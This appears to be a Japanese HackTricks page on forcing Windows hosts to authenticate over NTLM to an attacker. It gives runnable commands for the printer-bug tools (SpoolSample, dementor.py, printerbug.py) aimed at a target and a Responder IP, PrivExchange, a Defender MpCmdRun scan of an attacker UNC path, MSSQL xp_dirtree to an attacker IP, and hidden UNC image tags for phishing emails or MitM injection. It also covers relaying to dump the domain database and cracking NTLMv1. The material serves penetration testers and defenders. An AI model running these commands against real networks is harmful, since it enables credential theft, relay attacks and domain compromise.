10 KiB
NTLM特権認証を強制する
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- **ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。
SharpSystemTriggers
SharpSystemTriggersは、サードパーティの依存関係を回避するために、C#とMIDLコンパイラを使用してコーディングされたリモート認証トリガーのコレクションです。
スプーラーサービスの乱用
_Print Spoolerサービスが有効になっている場合、既知のAD資格情報を使用して、ドメインコントローラのプリントサーバーに新しい印刷ジョブの更新を要求し、通知をいくつかのシステムに送信することができます。
プリンタが任意のシステムに通知を送信する場合、そのシステムに認証する必要があります。したがって、攻撃者はPrint Spooler_サービスを任意のシステムに対して認証させることができ、この認証ではサービスはこのコンピュータのアカウントを使用します。
ドメイン上のWindowsサーバーの検索
PowerShellを使用して、Windowsボックスのリストを取得します。通常、サーバーが優先されるため、そこに焦点を当てましょう:
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
Spoolerサービスのリスニングを見つける
@mysmartlogin(Vincent Le Toux)のSpoolerScannerを若干変更して使用し、Spoolerサービスがリスニングしているかどうかを確認します。
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
あなたはLinux上でrpcdump.pyを使用することもできます。MS-RPRNプロトコルを探してください。
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
任意のホストに対してサービスに認証を要求する
SpoolSample.exe <TARGET> <RESPONDERIP>
または、Linuxを使用している場合は、3xocyteのdementor.pyまたはprinterbug.pyを使用します。
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
Unconstrained Delegationとの組み合わせ
もし攻撃者がすでにUnconstrained Delegationを利用してコンピュータを侵害している場合、攻撃者はプリンタをこのコンピュータに認証させることができます。Unconstrained Delegationにより、プリンタのコンピュータアカウントのTGTはUnconstrained Delegationを持つコンピュータのメモリに保存されます。攻撃者はすでにこのホストを侵害しているため、このチケットを取得して悪用することができます(Pass the Ticket)。
RCP Force authentication
{% embed url="https://github.com/p0dalirius/Coercer" %}
PrivExchange
PrivExchange攻撃は、Exchange ServerのPushSubscription機能の欠陥に起因します。この欠陥により、メールボックスを持つ任意のドメインユーザがExchangeサーバを強制的に認証させることができます。認証はクライアントが提供する任意のホストを介してHTTP経由で行われます。
ExchangeサービスはSYSTEMとして実行され、デフォルトで特権が与えられています(つまり、2019年以前の累積更新プログラムではドメインのWriteDacl特権を持っています)。この欠陥を利用して、LDAPにリレーしドメインのNTDSデータベースをダンプすることができます。LDAPにリレーできない場合でも、ドメイン内の他のホストにリレーして認証することができます。この攻撃により、認証されたドメインユーザアカウントを使用して直接ドメイン管理者になることができます。
Windows内部
Windowsマシン内にすでにアクセスしている場合、特権アカウントを使用してWindowsをサーバに接続させることができます。
Defender MpCmdRun
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
MSSQL
MSSQLは、Microsoft SQL Serverの略称です。これは、Microsoftが開発したリレーショナルデータベース管理システム(RDBMS)です。MSSQLは、Windowsプラットフォーム上で広く使用されており、企業や組織でのデータ管理に使用されています。MSSQLは、データの格納、クエリの実行、データのバックアップと復元など、さまざまなデータベース関連のタスクをサポートしています。MSSQLは、セキュリティ機能や高可用性オプションなど、さまざまな機能を提供しています。
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
または、この別のテクニックを使用することもできます:https://github.com/p0dalirius/MSSQL-Analysis-Coerce
HTMLインジェクション
メール経由
侵害したいマシンにログインするユーザーのメールアドレスを知っている場合、単に1x1の画像を含むメールを送信することができます。
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
そして彼がそれを開くと、彼は認証を試みるでしょう。
MitM
コンピュータに対してMitM攻撃を実行し、彼が視覚化する可能性のあるページにHTMLを注入できる場合、次のような画像をページに注入してみることができます:
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
NTLMv1のクラック
NTLMv1のチャレンジをキャプチャする方法を読んで、それらをクラックする方法を確認してください。
NTLMv1をクラックするには、Responderのチャレンジを「1122334455667788」に設定する必要があることを忘れないでください。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけて、独占的なNFTのコレクションを発見してください。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- **ハッキングのトリックを共有するには、hacktricksのリポジトリとhacktricks-cloudのリポジトリ**にPRを提出してください。